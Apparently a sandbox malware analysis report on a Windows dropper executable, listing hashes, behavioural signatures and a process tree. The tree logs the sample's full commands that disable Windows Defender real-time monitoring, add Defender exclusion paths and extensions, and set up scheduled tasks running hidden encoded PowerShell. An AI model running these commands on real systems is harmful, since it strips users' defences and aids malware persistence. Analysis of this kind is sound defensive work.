Analysis

  • max time kernel
    245s
  • max time network
    246s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    26/08/2024, 05:01

General

  • Target

    35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe

  • Size

    7.3MB

  • MD5

    d899e1c3b4b597f35991ad001796efb6

  • SHA1

    74b306cc449fab5ca903c480a953c4390660cca4

  • SHA256

    35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549

  • SHA512

    99220fbfc50497a6c194a0adff91ab88d8617d71572e787896d11ba374d936acdc4fa2ab519d494cc5c6a0f1bd2d19158f3bed4a782827e88f51c562a9c1daa0

  • SSDEEP

    196608:91OlKUM0XQhhsNRl31gOfczhFgsm7BrrcfWMhbr0Ow6mrjKLlT:3OlQ0U+pfcFCsm7BrrcfXG6JLl

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Runs PowerShell with the display window hidden.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and similar sensitive data.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe
    "C:\Users\Admin\AppData\Local\Temp\35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Users\Admin\AppData\Local\Temp\7zSC67A.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2312
      • C:\Users\Admin\AppData\Local\Temp\7zSC8CB.tmp\Install.exe
        .\Install.exe /ldidp "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2116
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2072
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2288
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2184
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:2460
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:2720
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2716
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2752
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              PID:2760
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                  PID:2816
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:2820
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                5⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                PID:2836
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2848
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    7⤵
                      PID:3068
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  5⤵
                  • Indirect Command Execution
                  PID:2764
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    6⤵
                      PID:2740
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2304
                        • C:\Windows\SysWOW64\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          8⤵
                            PID:2608
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                    4⤵
                    • Indirect Command Execution
                    PID:2700
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      5⤵
                        PID:3016
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          6⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3036
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                            7⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3004
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bWNXgrRlacKgnUwPKK" /SC once /ST 05:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe\" Hi /gdpdidfiz 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Scheduled Task/Job: Scheduled Task
                      PID:2860
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 676
                      4⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:1720
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {3B30062D-F970-4E37-9734-8D823D3745AA} S-1-5-18:NT AUTHORITY\System:Service:
                1⤵
                  PID:2052
                  • C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe
                    C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe Hi /gdpdidfiz 525403 /S
                    2⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:2068
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1792
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                        4⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:496
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          5⤵
                            PID:448
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:1136
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                          4⤵
                          • Indirect Command Execution
                          • System Location Discovery: System Language Discovery
                          PID:2092
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                            5⤵
                              PID:1648
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                6⤵
                                • System Location Discovery: System Language Discovery
                                PID:320
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                            4⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:1696
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1944
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                6⤵
                                  PID:948
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                              4⤵
                              • Indirect Command Execution
                              • System Location Discovery: System Language Discovery
                              PID:1392
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                5⤵
                                  PID:944
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1088
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                4⤵
                                • Indirect Command Execution
                                PID:2572
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                  5⤵
                                    PID:1764
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1520
                                      • C:\Windows\SysWOW64\gpupdate.exe
                                        "C:\Windows\system32\gpupdate.exe" /force
                                        7⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2096
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "gCsdWAqEI" /SC once /ST 00:16:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                3⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:1784
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /run /I /tn "gCsdWAqEI"
                                3⤵
                                  PID:2140
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /DELETE /F /TN "gCsdWAqEI"
                                  3⤵
                                    PID:2904
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2756
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                      4⤵
                                      • Modifies Windows Defender Real-time Protection settings
                                      • System Location Discovery: System Language Discovery
                                      PID:2820
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2760
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                      4⤵
                                      • Modifies Windows Defender Real-time Protection settings
                                      PID:2852
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "gcpmSykxt" /SC once /ST 02:28:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2980
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /run /I /tn "gcpmSykxt"
                                    3⤵
                                      PID:2204
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /DELETE /F /TN "gcpmSykxt"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1352
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                      3⤵
                                      • Indirect Command Execution
                                      • System Location Discovery: System Language Discovery
                                      PID:768
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1536
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                          5⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1356
                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                            6⤵
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2728
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                      3⤵
                                        PID:2696
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2008
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1008
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:1000
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                          PID:1692
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:1656
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2504
                                            • C:\Windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2168
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C copy nul "C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1592
                                          • C:\Windows\SysWOW64\wscript.exe
                                            wscript "C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Modifies data under HKEY_USERS
                                            PID:2560
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1092
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:320
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:612
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:1088
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1460
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:484
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1596
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:908
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1788
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2256
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:1264
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1752
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:716
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:2404
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1296
                                            • C:\Windows\SysWOW64\reg.exe
